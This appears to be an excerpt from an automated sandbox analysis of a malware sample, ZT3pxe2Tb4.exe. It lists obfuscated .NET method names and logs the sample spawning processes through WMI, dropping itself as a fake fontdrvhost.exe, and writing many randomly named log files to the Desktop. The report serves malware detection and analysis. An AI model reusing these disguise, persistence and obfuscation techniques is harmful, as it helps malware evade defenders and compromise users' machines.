                        Source: ZT3pxe2Tb4.exe, c3y73XWUiip6Ld5dLTo.csHigh entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', 'lkUWFuNFdy3', 'cnqWi5B8Sbb', 'M19VD1WoSDuJrpgrj8qP', 'pja14cWo1QES1tkPJU7l', 'uDt9xnWogRh1wEaAPU4v'
                        Source: ZT3pxe2Tb4.exe, MtpvWFxndmfaRZi5UFW.csHigh entropy of concatenated method names: 'b7jxPEdlOl', 'QWPxExhebG', 'EeQxU586pA', 'YSZxvRENuU', 'W5Jx5YeqQm', 'UHYPo9WV3uT83YTQ9JAV', 'v6D7Y2WVWeAW47Ya9oLM', 'mHFnTeWVL773K60AOhR0', 'GZxHypWViOru2W9U05if', 'HcQXS7WVjtF69T8V3Hek'
                        Source: ZT3pxe2Tb4.exe, zuitJ08Miu7x1I3wlys.csHigh entropy of concatenated method names: 'X1eAnbWXBxMBKwPjYEGy', 'VrmBZRWXpYmseugRB2wB', 'hQTrWRWXuI6GnFoqcbBB', '_7kT', '_376', 'e298FM2M51', 'eM986RRr48', '_4p5', 'oOe8HFvTFp', 'UFs88NnOw9'
                        Source: ZT3pxe2Tb4.exe, EUZnvjhVDkfEOpF8qtm.csHigh entropy of concatenated method names: 'Bv3htjMnJu', 'KM3hm8NZQL', 'SkNhnte9pv', 'twIhfqM1bP', 'PK8hPsMiAN', 'aNNhECfeAe', '_4tg', 'wk8', '_59a', '_914'
                        Source: ZT3pxe2Tb4.exe, CudGtbJnUdMqyGkOyGM.csHigh entropy of concatenated method names: 'fIaWMU1mAAW', 'BSNWMv8UYy3', 'JV4WM5mwkCu', 'D8bWMIoHwnx', 'sxYWMQbD7Ot', 'os0WMRw0g3P', 'TQ0WMwcSvjY', 'ExdA6bgZHi', 'mvMWM4k2kei', 'E7qWMCmTBqQ'
                        Source: ZT3pxe2Tb4.exe, aL44LIoQoNd9326E6sO.csHigh entropy of concatenated method names: 'P2qowNiiSZ', 'Rlko4pRphs', 'vMIoCBKRXB', 'Xe9oc4EfrY', 'rASoJY2fkd', 'yl8oAiVTF3', 'cQdozCBLd9', 'ApPh39cIEt', 'BxMhW8dWmv', 'LWJhLASQo4'
                        Source: ZT3pxe2Tb4.exe, BQrhPBRjIY94a9BGjPW.csHigh entropy of concatenated method names: 'HP3RMVm9lv', 'YgHR2fhOSt', 'iBnRFAMuLb', 'mQCR6uPpHT', 'oJLRH2wO9D', 'VF4R8GMCij', 'sjyRN9GTr1', 'YLSRx4SAli', 'UueRsUgfUY', 'kknRTPiHVa'
                        Source: ZT3pxe2Tb4.exe, UxmYitTB4aVlnUcMt7B.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'tfyTSFUAGk', '_947', 'QCKT169MAK', 'ypVTga4gGX', '_1f8', '_71D'
                        Source: ZT3pxe2Tb4.exe, xGXCVXRnqsrcf8MjaPh.csHigh entropy of concatenated method names: 'FO7RPWXO44', 'wXoRECg4CQ', 'iq1RUFSKyh', 'eArRviKlQa', 'G8BR5YQpHy', 'TWrRI71uvB', 'xoyRQVJ0Si', 'ki3RR3hIDT', 'IhL1A7WculSAWP8LKocM', 'mJkaSsWcDTkeYb1ioiOj'
                        Source: ZT3pxe2Tb4.exe, rqW7SwQjVj5lFN7Wtgl.csHigh entropy of concatenated method names: 'dcyQMJkeaa', 'tOeQ2Q2uwf', 'tfwQFrnTLy', 'qTfQ640qDw', '_0023Nn', 'Dispose', 'neen1HW4Q7eYdTJHolUk', 'xWV58CW451iad724ZUk0', 'IYDraoW4IasLwLkLEJd3', 'k5X6LcW4RJQ4X8b9E41c'
                        Source: ZT3pxe2Tb4.exe, gpZraAqE8t6bNqW3rKd.csHigh entropy of concatenated method names: 'P4RqciSxn6', 'l7FqJch5m4', 'olxH4hWa7mkiPXmG2Mu0', 'pR3KIyWaaQH9GXHf0CEE', 'sLZ6ulWalVIWCdwDY13q', 'R0fMWkF2v7', 'pUv33DWaXvxshWMWWEfg', 'OM5EMDWaVuo9ThEZe0od', 'djHGUUWaYUAqxBssoDSM', 'wNbYQVWa0w4bZfGaJ4N8'
                        Source: ZT3pxe2Tb4.exe, AWst4S0tAZLyykQy96r.csHigh entropy of concatenated method names: 'RPq0n2PjrA', 'aQs0fwrOdy', 'PyK0PIBaMx', 'iQZ0EgYKas', 'kIV0U5qXhZ', 'HgR0vAZei3', 'Kvk052gSC8', 'fu30I6hfs8', 'YwX0QW3lRg', 'cQ10RGX0po'
                        Source: ZT3pxe2Tb4.exe, BUP4lgHfnBc46OMHy7l.csHigh entropy of concatenated method names: '_34V', 'y7u', 'j1FWFXoeQm0', 'Mf4HEuBiOs', 'gt1', 'mlV8KAW07iHJ2oL9Rw42', 'cIWCdFW0aoINaN278L3a', 'TMEb5HW0l4SlX0bpidGv', 'OMTYv1W0dQ2XlXAVf5s2', 'hNp0pyW0Y64F6Q84Bwkw'
                        Source: ZT3pxe2Tb4.exe, N8RSOlLO9Gp83pgPicl.csHigh entropy of concatenated method names: 'EkALr3hiE2', 'eqDBhjWhs9DdI53SPxdm', 'FodORAWhNPLCW5AYpLxS', 'E4RJyvWhxysJYp0N97uo', 'nJIQWSWhTrpIG2Ew7w0a', 'LS4NfbWhkHKgU3WXZNBE', 'TKiLa66oEO', 'xsqLlyPY8p', 'rWOL7C6dr0', 'Xo5LdZoG37'
                        Source: ZT3pxe2Tb4.exe, NXd2dm6nao4utQP3xcT.csHigh entropy of concatenated method names: 'IDV', 'd65', 'y8xWFoSgNvU', 'HyrWj32dYif', 'QZ46PxKksQ', 'IMD5bRWYTFvlGpXSnOsx', 'zLsl3qWYkdBlcVpbsN8y', 'Kjl4aLWYDVR0bC9VwHUp', 'GQVrWJWYpMCkHsiPpbCB', 'nv45wtWYuyAlvUCi09hP'
                        Source: ZT3pxe2Tb4.exe, DBGeHyiDRG5ErPLiQ6i.csHigh entropy of concatenated method names: 'EoaioEV72M', 'lNWihCo1Z6', 'JJaiOKomkx', 'mySDNIWOFXUhnjZWuUji', 'VJssn2WOMketcQMImPrg', 'hpWxK7WO2cxNhTtCfV4Y', 'hkoi9CZE33', 'kuXiZQKEj7', 'APhP4kWOj8S96SPPAf9t', 'y7PtKJWOLQWYq4PAtqhC'
                        Source: ZT3pxe2Tb4.exe, M6SPGhQxLc1aSIS1yXU.csHigh entropy of concatenated method names: 'iOnWM0BC61s', 'plpWMXQYwLO', 'lPyWMVd2Aic', 'itEPLvWCyjBuu2MCGtLq', 'zTH20aWCbv2fd4jWnPAM', 'TyBwNeWCoxtMeV6Ry6yt', 'N71WFEG4ufV', 'plpWMXQYwLO', 'eoJ1gAWCaWdI7y3uxm5W', 'nZMD1DWCOB5iJkCNTTff'
                        Source: ZT3pxe2Tb4.exe, ryu8bxoG9xsMFGvwTbA.csHigh entropy of concatenated method names: 'HVNo1y2WyW', 'rsKognoaEK', 'ov8oehuEMy', 'Se7o9AV7hn', 'pMhoZFc2Kd', 'r1eoyubN37', 'P2cPI0WEBOipBLFZQYRo', 'Qy8WQ7WEpOfASBkVVI4Q', 'DRiRAAWEuHVsTqUbtId2', 'ioHVOEWEGEX05cROaYlY'
                        Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.csHigh entropy of concatenated method names: 'wYvC2oWJSQjM8vNAifol', 'SdyQ3DWJ1WqTCyxdwST5', 'GAtcco2xLB', 'iwb7QEWJZ9y47E5JDSdJ', 'Sdtwb0WJyqNiBg0vHhB8', 'S2pYfHWJbk4TmI3MwGrT', 'qrm6iwWJowNa6qDPrMVn', 'hi8CJyWJhltpoZrEOFu0', 'zmwpuEWJOPcQuiITomjM', 'a6fVVHWJKGUiogPjcy14'
                        Source: ZT3pxe2Tb4.exe, H95vgtMfmgjo8uRkCOU.csHigh entropy of concatenated method names: 'rqR23wC7es', 'GU62WrjbJE', 'PWA2LyMsUn', 'ImJ55hWlnpe9OeCUZlCl', 'scBP3fWlfC7NLDCCPi9L', 'OSDL9EWlt2VAcTKbuyf4', 'qZwoD8Wlmywgq8FH81mR', 'gRuMEtPn3m', 'LO2MUgTJB5', 'M8cMvT801X'
                        Source: ZT3pxe2Tb4.exe, hkf8C7M207boKQQHk30.csHigh entropy of concatenated method names: 'F9rMGCUPFm', 'T8MMSkHvSp', 'FWqjjpWl3Kdnm8xC13hB', 'TEDJbiWaAqLBX1ofYce8', 'BBVpAGWazHIKMqspRQ5t', 'O2gIv2WlWcwma4ZTm9qr', 'b2XMp3AsxN', 'uB0MuRFCHc', 'RtdQW0WaChlscADO9MVe', 'ji0nINWawERVw8t8cgHY'
                        Source: ZT3pxe2Tb4.exe, Cjj50nXGLj0ZTJOPI3k.csHigh entropy of concatenated method names: 'xqk72kWRd7lpvVj2i4gd', 'g8YFkYWRYpxcC3lkAPyK', 'GmAbPLWRlWAn3WDEVsUe', 'lgKJVXWR7tpcDfp9HiHA', 'xrtnDuWROL1SeRo3DgXi', 'i9uMy5WRKNfhNUCSuebp', 'rEAAbvWRoRuYrnbbhjQE', 'iPOn9vWRhcYoSE9ZstI5'
                        Source: ZT3pxe2Tb4.exe, odu5MJzCeylv0KMbdI.csHigh entropy of concatenated method names: 'TXmWWKUc0n', 'HjdWiojb1p', 'RAjWjQ6d1u', 'dydWqLosMI', 'Mg4WMv1Gjt', 'eChW2fd5WP', 'EQnW6fbSyQ', 'ObLsLoWboEG2PJZsAZQ6', 'hqvuGcWbhSY25VXY3sFl', 'caXqQLWbODBWG941kOvI'
                        Source: ZT3pxe2Tb4.exe, bBbFAXpRHjfbKj4fxXX.csHigh entropy of concatenated method names: 'Qt7Rv2Wnr9IAj9i0cKws', 'yUvPCIWnt1ehFJoq4WDx', 'dXbFFjWnmr3t8cvrTBk7', 'EIGgZT8XV5', 'OrUwo3WnEmlnw3VR7Y5Z', 'FwNpI2WnflmgpVPN3Ayn', 'cTHJHDWnP4LvhmMJS2pO', 'hMIgHqWnUqrnaHnXV9qV', 'eCsHC8WnvS6NKDoIemUX', 'eeQgoeB8OC'
                        Source: ZT3pxe2Tb4.exe, OpKD0lidMg583mZg3xK.csHigh entropy of concatenated method names: 'dUqi0YJoDy', 'HnpiXigub6', 'Gh2iVAmGd8', 'xIjirKi6Sf', 'duGitkPl9c', 'y7IimqIRpp', 'fb1inTdwuH', 'NsRifKqb1C', 'fPGiPqXkby', 'bVmiEaL05S'
                        Source: ZT3pxe2Tb4.exe, XEkmGGCp8qxEBME3Y23.csHigh entropy of concatenated method names: 'YGWLqUeNIwY', 'Sx5OMjWJsrks2TqkiKRa', 'Did4nkWJTAUTHwCpEBPq', 'QmL8X3WJkt9bKx1PpLXR', 'dHtYd7WJDHySugbch8nw'
                        Source: ZT3pxe2Tb4.exe, dJShQx7UFqhUNotsxMD.csHigh entropy of concatenated method names: '_25r', 'h65', 'SwC75nrve4', 'srn7IVMVqR', 'BBW7Qomx7j', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
                        Source: ZT3pxe2Tb4.exe, kAsrVt28NY4q1okyEwG.csHigh entropy of concatenated method names: 'BIr2xcNqFZ', 'dk82sIm0vW', 'jpG2TbnqSO', 'e4FEaGWlRSHBGri3hIv1', 'zhfxs2WlwgoRVj83AnVi', 'p0eHciWl4L0IhqtEJEys', 'Yv8hBIWlCXtvruduVsxU', 'xdJkVRWlcpwLLnAKFvdp'
                        Source: ZT3pxe2Tb4.exe, C1w6GQH6uuREBUG2hXr.csHigh entropy of concatenated method names: 'J3ZHskveia', 'pBQjJFWYQPh1t9JgkYgA', 'WBk1saWY5WhkZ4FSZ6oU', 'B3mNHUWYIZCv7oRpASqq', 'I51kjUWYRupDdkECTZbm', 'CEI2s8WYwQgR9yiL3xrf', '_53Y', 'd65', 'I5aWjePS6oO', 'HltWj9uwY8t'
                        Source: ZT3pxe2Tb4.exe, T2T5iSIKET210oxdcXb.csHigh entropy of concatenated method names: 'k9fI7EETs2', 'mUaIXrVYrE', 'KP8ItxKMhF', 'M3eImN3guN', 'WAAInL1qAQ', 'fCJIfFiAaq', 'g03IPdB6v5', 'vwJIEgqTcu', '_0023Nn', 'Dispose'
                        Source: ZT3pxe2Tb4.exe, R6vBZyKah4J5acQK53O.csHigh entropy of concatenated method names: 'ctuK7c171V', 'vqcKdo0H8Z', 'zFrKYBWXK0', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'yeQK0jtSFx'
                        Source: ZT3pxe2Tb4.exe, An43bwHCmwL8IFbu9GJ.csHigh entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'zxZHJ9e98l', 'FekWFtoTRR2', 'PZZHAgylGS', 'thxWFmfY0fs', 'uvkP6qW05LhwIa7chWKm', 'hmoUOUW0UCadcAZZYGW0', 'VBE0PZW0vqX3eM0CrIZ6'
                        Source: ZT3pxe2Tb4.exe, v8QDIMOi2wN3bwmtmQC.csHigh entropy of concatenated method names: 'QxiOqqJqfM', 'kQTOMtJXvW', '_7Bm', 'GtNO2VYuuP', 'qhyOFIOw0C', 'hEJO62a5O8', 'jVGOH3SCPl', 'upMaEeWUVAcZpI7fuQjC', 'TZuPWEWU0Dnllct0adbC', 'PZ39WkWUXWl89KkoFbE6'
                        Source: ZT3pxe2Tb4.exe, xIqDoaaMLvj33sZyqpu.csHigh entropy of concatenated method names: 'yBePW9W5XYZfgpUN59Q0', 'oxyK5hW5Y3CmiJNJhIrW', 'mgLPniW50b0dafQQ6lL0', 'nhdaFKcjqp', '_1R8', '_3eK', 'Kc2a6yELxd', 'jgnaHTkwRb', 'ItMa8MQI9M', 'tduaNrAr6x'
                        Source: ZT3pxe2Tb4.exe, q2rE5WIZ0VEXSXWmW5a.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'lArIb693gl', 'zETGaFW49vxvbPE9JdSq', 'pIDnegW4ZLkdImMww6xn', 'taZb3GW4yY2n29sIJae5', 'dPfXJlW4blxD65yVTLIl', 'b9Ku0eW4oSParpFmtR3y', 'FQXIvnW4hVnRaS6xYDhn'
                        Source: ZT3pxe2Tb4.exe, sfYYHd5IKSRE4RMxBy5.csHigh entropy of concatenated method names: 'C14WFPRAuQI', 'bg05RCylOu', 'UBF5wMH0Pf', 'Q3I54mBT2m', 'cZiDTqWwKD96H0gkCru9', 'PWXjVyWwa65XnaOAnQOw', 'MxP98XWwl6V88oeAT2UT', 'pBoGp9Ww7ykW5exjScRs', 'vM46H1WwdWdZ0oDUxhqZ', 'T0dVH5WwY8msljDW8Sga'
                        Source: ZT3pxe2Tb4.exe, JrurtS2lj31Cs6BodjK.csHigh entropy of concatenated method names: 'hKE2EOXnKJ', 'RSo2Un4Sal', 'oKA2vHxfL8', 'tnVhedW7Zo5BwmvGlB9i', 'avS6A3W7e5tQS5YoTCe1', 'g6J7weW79cByhyjgAtxN', 'fni2dY11RH', 'lGO2YclNWZ', 'NNv20fkohU', 'xnX2XSZJ00'
                        Source: ZT3pxe2Tb4.exe, IKFMi52wZfruKtYB7OI.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'tF5d9XW7ldicFEOFWUsw', 'G1atOjW77ZvODKACGfN7', 'n6eXljW7dOU7bqG3gBZN', 'jbD2CNqj0a'
                        Source: ZT3pxe2Tb4.exe, zRgPCq6woxI16aoWYBS.csHigh entropy of concatenated method names: '_46E', 'd65', 'lXL6CE8ZCq', 'k1vWFOTw9qC', 'HyrWj32dYif', 'PhF6cMw4d3', 'E6ATqlWYbAKSNYqhYd3o', 'EgCAbDWYoQNVWF1VFLUe', 'PgWwWKWYZuk51jyofvEW', 'IQi8PWWYyNCKQ65Bjwy8'
                        Source: ZT3pxe2Tb4.exe, QcZOAO6vk8rAj7gtvNM.csHigh entropy of concatenated method names: '_8X5', 'd65', 'WSXWjpM8MYd', 'rG7WjuoDpE8', 'hwHWFhIXyCn', 'HyrWj32dYif', 'sEEjUIWY1LK45Tyk1509', 'SxplQFWYGFePOONVuhoJ', 'sMSZrMWYSDKRfQkp4gwZ', 'JP1HyGWYg2Ylpi5jadoX'
                        Source: ZT3pxe2Tb4.exe, lLDVmHLWjUhCgYrl3Rg.csHigh entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'HhNWFG8bXcH', 'cnqWi5B8Sbb', 'X8AQLdWolZGJxE38xfCR', 'Y7Sd6lWo722K81KQJ3FY', 'TCt6L4WodsXcKPX2ZL6w'
                        Source: ZT3pxe2Tb4.exe, V8766ojZZ4pu3HNSGos.csHigh entropy of concatenated method names: 'arCjbqDUrl', 'bU3jomaRAl', 'fxejh6Pdhr', 'T7GjOXB093', 'lgdb66WKsWBGWtTbOSLg', 'zgUv20WKTs7gtxMXsqGp', 'wN05nXWKkTuVfTyOMk32', 'NOLUt4WKD2vR98fuVTVr', 'ryJ3C6WKpOS3bm1ZbBMx', 'ew0LLVWKuBM2g2r0q5Y0'
                        Source: ZT3pxe2Tb4.exe, WVZ0XYgYvlJtODagQ4F.csHigh entropy of concatenated method names: 'ahobZ0h2pM', 'n71byrebkH', 'MTWkW5WPKDbrUbfHH11G', 'r7Cs7SWPhPaojModqhZn', 'OBa3sgWPOefmy3Y7tWD7', 'Gk309gWPattNTrjvlY2w', 'T1rEcAWPlAtWwwg6dj46', 'WPBbavVqcE', 'HHiIiIWP0OwIOiilHw3g', 'pU4vH4WPdRnGTtrF1Viv'
                        Source: ZT3pxe2Tb4.exe, GYCJ4CFUhCyW29mDrt9.csHigh entropy of concatenated method names: 'pyKFwXLJtt', 'm4eF4gHWm3', 'SQhFCmN6qa', 'JM4FcXkOwE', 'cmeFJSEqwv', 'O2eFATvm8h', 'zW6FzaBrNf', 'Jwu2q1WdZWckrAEECoy7', 'cUp2nUWdyO0LpGWuhhw5', 'dv4QX0WdeE5UyisZg8xV'
                        Source: ZT3pxe2Tb4.exe, IpLxPxiJdq7xL6uVcaa.csHigh entropy of concatenated method names: 'ahWjTuYles', 'rEkPJnWKWqQ9i3GBmu5C', 'Pc1X37WOz09bHfLGhpPC', 'qTJKICWK3Wy4tyITLdPj', 'pRNLW4WKqOVqJjVhvi9s', 'h58omOWKiPhADiSt5yW6', 'gZpMuQWKjkfbwlRe1pwW', 'MiAk6QWKMaI9bmcWvWeP', 'toujg5o3n4', 'rR1kOeWKFE608C3DKwrs'
                        Source: ZT3pxe2Tb4.exe, hMT9ywHlIqlcYuym49Q.csHigh entropy of concatenated method names: 'Yi3', 'zMtWF7R1TaH', 'RLJHd2wyg9', 'mRsWFdCKttI', 'GGqUqJW0uIaM5SGOMZRL', 'NZIZbQW0Bp8snB9vxcS9', 'gLQnlPW0DTrsZoPoqhfm', 'vWWgG2W0pktMsZrUDE9s', 'QoYXryW0GY9vbhW580db', 'k8u5veW0S33SNv9uhQ8U'
                        Source: ZT3pxe2Tb4.exe, oYwZnTJ15040JqFbW6V.csHigh entropy of concatenated method names: 'N1aJlXhMBd', 'rRwJ7vQZj8', 'yr7JdB9frj', 'mb7JY6hFXI', 'WRhJ0vPybJ', 'FtEJX7oEE6', 'GX4JVOiVXt', 'JJ8JrGN4dp', 'lNJJtSsDGp', 'OB8Jmb4KMh'
                        Source: ZT3pxe2Tb4.exe, a3TVa9pePG9oxZpcv7.csHigh entropy of concatenated method names: 'L2x7TpOb1', 'xRbFGtWyw7LZDM6uhCl0', 'TCyhTVWyQPyXwgXJmVlE', 'JZ2x2iWyROMTIGDHNsRK', 'v0WBgUSfr', 'HYRGaqCYV', 'BPvSfs5rf', 'Wku1NZ6GR', 'UVkgJAyeq', 'eEieZ8pBs'
                        Source: ZT3pxe2Tb4.exe, m9y5wALnB8SHFKsKEAV.csHigh entropy of concatenated method names: 'zbSLJgGDnv', 'pvFLAKXC3u', 'kpoLzxUEwQ', 'sF2nYfWh70XvZxUVL3LY', 'ugO4ESWhaH24Xk31gykB', 'ACFtYpWhl3HKL3M6ner0', 'XL5iq82DK7', 'QdDyGuWhXSFNpWWw30Be', 'QD3K41WhY9jqBgA0Ia1X', 'pu2RGGWh0JW2wxAbrAbM'

                        Persistence and Installation Behavior

                        barindex
                        Creates processes via WMI
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\IsWIxvZJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\auteTnDC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fzXEwQRC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zTojkKNX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\AaPSReOe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uztLDTCs.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\hezDLgou.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\tIxJOpqh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CkrRJHNx.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\bYjfzcZg.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\xOrrZDRn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\yEAAOeyR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WvXEaKPX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ntFcgnCN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\feqUKmVF.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\bAJNFhyM.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\WAZwZzli.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\BxnIYuRz.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\AppData\Local\fontdrvhost.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\EQFIYaOX.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fLnmpTPV.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RMfXVWDe.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\EOpBrqDR.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\nJodFojJ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\UbSwNisy.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aYVnMXzh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\RnzHiPIs.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\RMCoLrQk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\uRiBlhjd.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\PCgnLZlk.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\qxbJOXLg.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CGTrJaEm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YMjefUJa.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\hRSCUTxn.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\CgRzmzKC.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\HuSZzPsz.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\LovAYRCw.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\inkviYhq.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\pzYaRqdW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\piqUgtXk.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\hJcmyZDP.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\eCwwaQCH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\QkEpPQey.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\tAOrkGQb.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\qiKKKJQB.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\lThKWNPp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\cnAeDqUL.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ELDRalsN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\oTDkKMId.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\IdUqmnRm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ipFMCTyG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\DACRVJoK.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\IbKgwPay.logJump to dropped file
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\avWEvUWS.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\ldamqVhj.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YsHvxEyH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KWVhlfdm.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aABfDneW.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YnJNkaiG.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KOmOGvDg.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\zldaSYtH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\FvSbvlyH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\mbeUnBPt.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\MLVQXpXH.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\NmOPODYO.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\JavyIngh.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\YBjETBXN.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\pntLeisv.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\KszgdGmQ.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\aLYWFcdp.logJump to dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile created: C:\Users\user\Desktop\fuaVjmBB.logJump to dropped file
